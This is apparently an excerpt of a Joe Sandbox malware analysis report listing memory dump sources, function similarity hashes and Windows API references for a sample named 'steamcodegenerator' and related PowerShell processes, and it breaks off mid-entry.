• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: AdjustPointer
• String ID: (none)
• API String ID: 1740715915-0
• Opcode ID / Opcode Fuzzy Hash: fe0cf1a3f0e36931d8326c1fa5e43f68e623f8e1a1bba44f29af81dcaff10926
• Instruction ID: ed538e78afea4afeae9b2eebe1d32182ba13bce65fb2ce6ca6a724a22b31ae41
• Instruction Fuzzy Hash: 04B1B631A0DF4283EA65AE959D412B9E3B4EF44BA0FA58435DB4D07B85DF2CF449CB20

APIs: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
• String ID: (none)
• API String ID: 1087005451-0
• Opcode ID / Opcode Fuzzy Hash: e056fb752b00353b83d650d62f1f17403a3bacc8c07260b3d954efaf1a3d08a7
• Instruction ID: 8c75a3474312153f37f02f4e542cff0ea8c7cfd8a98506bca22ec23a132230b7
• Instruction Fuzzy Hash: F781A622F14F4186FB10ABE5D8013FC6371AB547A8FA09235DF6D16BD6EF3891998350

APIs: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: _set_statfp
• String ID: (none)
• API String ID: 1156100317-0
• Opcode ID / Opcode Fuzzy Hash: c857c3327227c68747334663d00ca9331fa9479a74f52c20cdb4b2826f66a1e0
• Instruction ID: 7203bf62722d153dc80729fe80bb7216b973831593cc33c9fb74eb8a67ab0d82
• Instruction Fuzzy Hash: D1810B22B0CE6645F626BF76AD423FAF250BF45778FA44231E94E165D0DF3CA4C98620

APIs: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: _set_statfp
• String ID: (none)
• API String ID: 1156100317-0
• Opcode ID / Opcode Fuzzy Hash: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
• Instruction ID: 7ff31445dc9228e01214b8ac0b183dc46476e45e24baeabd367cae7f11d190fb
• Instruction Fuzzy Hash: 23117F22E1CF2202FA5831A4EE563B592406F69374EE50330E6BE666D68F2CAE495134

APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A4F7
• FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A516
• FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A53E
• FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A54F
• FlsSetValue.KERNEL32(?,?,?,00007FF71C061CE7,?,?,00000000,00007FF71C061F82,?,?,?,?,?,00007FF71C061F0E), ref: 00007FF71C06A560
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: Value
• String ID: (none)
• API String ID: 3702945584-0
• Opcode ID / Opcode Fuzzy Hash: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
• Instruction ID: e74243505194c41a60ee935cff9fa0f92b14cbae1278d6acff9cfeeb05a39978
• Instruction Fuzzy Hash: 3C116060F08E2241F958BBA66E521F9F2559F443B0EE45334E92E067D6DF2CE5894220
APIs
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
• Instruction ID: d21d2990399afb6e1ce6be681a493dfccf37cf4ecaca47bf55821516bc2fdd9c
• Opcode Fuzzy Hash: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
• Instruction Fuzzy Hash: 7211FB60F0DE2645F9587FE65D520F9B2458F45370EF45734EA2E0A2C2EF2CB5895230
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
• Instruction ID: 8c0771bad729981747ec79e055c13ebbf798d20ef28f3a0f1077a853f67190b1
• Opcode Fuzzy Hash: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
• Instruction Fuzzy Hash: 27919273A08B858AE710EBA4D8402EDBBB0F749798F604236EB8D17B55DF38D199C710
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
• Instruction ID: c7dcc2736ac20e6a7c3a8c76e0055693634793c0f1e027882bfeb38a45ffeec8
• Opcode Fuzzy Hash: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
• Instruction Fuzzy Hash: 5751B132A19B028BDF54EB55D8056B8B7A1EB44BA5FA08131DB4A47748DF3DE885C720
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
• Instruction ID: b5cbb72af6d961c7800a05d1728be5f2a21217cf1d880c1bd07b8aff8c1df90d
• Opcode Fuzzy Hash: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
• Instruction Fuzzy Hash: 23619232908B8586D720AF55E8403EAFBB0FB897A4F544225EB9C43B59DF7CD198CB10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
• Instruction ID: dca516eae5cce23b0cb682747fd046e2583689602b47a9e6c76fbc5582ed8a25
• Opcode Fuzzy Hash: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
• Instruction Fuzzy Hash: AC51CA72908A8187EB34AF9599443B8BBB0FB48BA4F644235DB9C47B95CF3CE454C711
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2775327233-1405518554
• Opcode ID: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
• Instruction ID: 6e3d1bcea5e8cfa92c093119c384d6224dd1bc2f2b7af200b4ab5a9f850fbb88
• Opcode Fuzzy Hash: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
• Instruction Fuzzy Hash: 6D412932B0AA418AEB14EFF0D8902FC73B4AF44758F984834DB4D66A55DF39D51AD324
APIs
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
• Instruction ID: b476f266ac825e32d3bdd499581b07234256d1281966e363c43be16fa8856fd6
• Opcode Fuzzy Hash: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
• Instruction Fuzzy Hash: 50D1F232F08A9189E711DFA5D8442EC77B1FB547A8BA08235CE5E97B99DF38D40AC710
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71C06D3AF), ref: 00007FF71C06D4E0
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71C06D3AF), ref: 00007FF71C06D56B
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
• Instruction ID: ca45522cecadd7866bafcf98d6f5d17ff35a6a932d7cbcaef52fa69983f4afde
• Opcode Fuzzy Hash: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
• Instruction Fuzzy Hash: 9891D762F08F6185F750AFA59C442FDBBA4BB047A8FA44135DE0E57A84DF38D489C721
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: __except_validate_context_record
• String ID: csm$csm
• API String ID: 1467352782-3733052814
• Opcode ID: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
• Instruction ID: f1b7fd0d5cb99ed6dae679d25e89390a87b2007301d5d82dc4ba1dd9da2cca77
• Opcode Fuzzy Hash: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
• Instruction Fuzzy Hash: 5471B432608A9187DB60AF65D8407BDBBB0FB09BA4FA48235DB4D47A85CF3CD455C750
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2558813199-1018135373
                                                                                                                          • Opcode ID: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                                                                          • Instruction ID: 59cacab1dbbe8012131e82b1ef8e7774732584538cdea6493a2840066b1e7a22
                                                                                                                          • Opcode Fuzzy Hash: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                                                                          • Instruction Fuzzy Hash: 5D517D72618B8287D620EB55E9412BEB7B4FB88BA0F600135DB8D07B55DF3CE495CB11
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                          • String ID: U
                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                          • Opcode ID: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                                                                          • Instruction ID: a3e2ffa80913f08dd48db0d1b226e5a249ac24ed2032dfd1c9c240fad86efbb2
                                                                                                                          • Opcode Fuzzy Hash: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                                                                          • Instruction Fuzzy Hash: 95419222B18B9592DB20AF65E8443E9B7A1FB98BA4FA44031EE4D87748DF3CD445C750
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                          • String ID: bad locale name
                                                                                                                          • API String ID: 1838369231-1405518554
                                                                                                                          • Opcode ID: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                                                                          • Instruction ID: 5194ab76a5e9dd0881720c592d74097ea817ea7220cf84ac2dd5204d541924a9
                                                                                                                          • Opcode Fuzzy Hash: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                                                                          • Instruction Fuzzy Hash: 51014F22505F818AC744EFB5BC40198B6B5FB58F98B685539CB8C8371AEF38C594C350
                                                                                                                          APIs
                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF71C0566AA), ref: 00007FF71C05AB6C
                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF71C0566AA), ref: 00007FF71C05ABAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                          • Opcode ID: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                                                                          • Instruction ID: 7a9651f1416c495ec5b2abb18c6b34082047026098f9dbc9ca17d2645e90d308
                                                                                                                          • Opcode Fuzzy Hash: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                                                                          • Instruction Fuzzy Hash: 1F115132A19F4182EB109B55F8002A9B7E5FB88BA4FA84230DBCC07B55EF3CD5558B40
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Facet_LockitLockit::~_Register
                                                                                                                          • String ID: @F
                                                                                                                          • API String ID: 2774363102-2348236604
                                                                                                                          • Opcode ID: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                                                                          • Instruction ID: 7b30006210f9b64156428f2e945de61ed0d8c8b78a07c73ec43d799c0da86e0a
                                                                                                                          • Opcode Fuzzy Hash: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                                                                          • Instruction Fuzzy Hash: D8E0C026608E0182DA10EF16F8510AAA360FB89BA4F985131EF8E07756CE3CD5958B50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2403345742.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34780000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                          • Instruction ID: 7f6ce6d3950398a1a76d3f915621f5b787bedea6720724a7873ccae3b611ec43
                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                          • Instruction Fuzzy Hash: 4001677121CB0C8FD744EF0CE451AA9B7E0FB95365F10056DE58AC3651D636E881CB45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6efb35294084de576040f1d86bfe0149b3abb2efa9d2368e8eaac151240c5049
                                                                                                                          • Instruction ID: d5b88a77d1bf428322af5471db995a702bbfe8fa0c260f62aec700d8d6d349a0
                                                                                                                          • Opcode Fuzzy Hash: 6efb35294084de576040f1d86bfe0149b3abb2efa9d2368e8eaac151240c5049
                                                                                                                          • Instruction Fuzzy Hash: FD129470A08A4D8FEBA4DF28CC557F93BD1FF59310F44827AD84DC7291CA78A9459B81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2672988975.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34770000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7c2032c3da01c6fff2e29e370795957443cde6f074aa50c8e7d4a5068d26db3b
                                                                                                                          • Instruction ID: bff7d748bc27eea8c9e3ce27817e81f6cf42047c260d6baa00723b0497684a76
                                                                                                                          • Opcode Fuzzy Hash: 7c2032c3da01c6fff2e29e370795957443cde6f074aa50c8e7d4a5068d26db3b
                                                                                                                          • Instruction Fuzzy Hash: CA029670608A4D8FEBA4DF28CCA57F97BD1FF55310F44823AD84DC7291DAB8A9448B81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 02bbea4700b837fc355dfc5082280729b5dbe7a4909bb758a4469015679c1e6f
                                                                                                                          • Instruction ID: 57863637750abc8ebb08989b3c01ef1a403f6bfd586144269462694487549669
                                                                                                                          • Opcode Fuzzy Hash: 02bbea4700b837fc355dfc5082280729b5dbe7a4909bb758a4469015679c1e6f
                                                                                                                          • Instruction Fuzzy Hash: 1AE11632B0DB8A4FEB95DB1888A56B47BE1FF5A710B1801BED54DC7293DE29AC05C341
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2673827516.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34840000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1cfe02ec0181788135e46d913ad6f6b500a5ebe683c888e75d57964a6ac40a6a
                                                                                                                          • Instruction ID: 1fe4968dcf87390800686c6aef643727c4038da15b344a01e27796a8e34ff027
